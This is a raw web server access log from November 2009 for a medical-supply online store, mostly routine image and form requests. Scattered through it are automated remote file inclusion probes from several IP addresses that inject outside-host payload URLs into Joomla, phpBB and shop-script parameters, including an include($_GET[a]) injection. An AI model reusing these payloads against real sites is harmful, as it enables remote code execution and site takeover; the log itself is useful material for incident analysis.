220.247.11.218 - - [13/Nov/2009:03:55:48 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:48 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:49 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:49 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:50 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:50 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:50 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:51 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:51 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:51 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:52 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:52 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:52 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:53 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:53 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:54 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:54 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:54 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:54 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:55 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:55 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:56 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:56 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:02 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:02 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1153765317A1C200717B08I+M37+ENG HTTP/1.1" 200 77213 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:05 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1153765317A1C200717B08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:05 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1153765317A1C200717B08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:06 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1153765317A1C200717B08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
222.236.221.38 - - [13/Nov/2009:03:56:11 -0500] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:56:11 -0500] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:56:11 -0500] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.247.11.218 - - [13/Nov/2009:03:56:12 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG HTTP/1.1" 200 57446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:13 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:14 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:14 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:14 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:14 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:15 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:15 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:15 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:15 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:17 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:17 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:17 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:17 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:17 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:18 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:18 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:18 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:18 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:19 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:19 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:19 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:20 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:20 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:56:22 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
222.236.221.38 - - [13/Nov/2009:03:56:52 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:57:05 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:57:05 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:57:08 -0500] "GET /logs/access_log.Q109080800//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:57:08 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:57:08 -0500] "GET //index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:57:27 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:57:27 -0500] "GET //index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:57:27 -0500] "GET /logs/access_log.Q109080800//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:58:08 -0500] "GET //index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:58:08 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:58:08 -0500] "GET /logs/access_log.Q109081000%20%20//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
63.174.244.10 - - [13/Nov/2009:03:58:19 -0500] "GET /logs/access_log.Q109100300%20%20//?path%5Bdocroot%5D=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
63.174.244.10 - - [13/Nov/2009:03:58:19 -0500] "GET //?path%5Bdocroot%5D=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
63.174.244.10 - - [13/Nov/2009:03:58:20 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
85.104.144.12 - - [13/Nov/2009:03:58:31 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
85.104.144.12 - - [13/Nov/2009:03:58:31 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
67.205.103.171 - - [13/Nov/2009:03:58:31 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:58:31 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:58:39 -0500] "GET /logs/access_log.Q109071900//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
220.247.11.218 - - [13/Nov/2009:03:58:43 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1153765E17C132008C4B08I+M37+ENG HTTP/1.1" 200 56611 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115376541E31620085CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:58:48 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1153775E1E315200142B08I+M37+ENG HTTP/1.1" 200 58108 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1153765E17C132008C4B08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
116.127.121.116 - - [13/Nov/2009:03:59:27 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
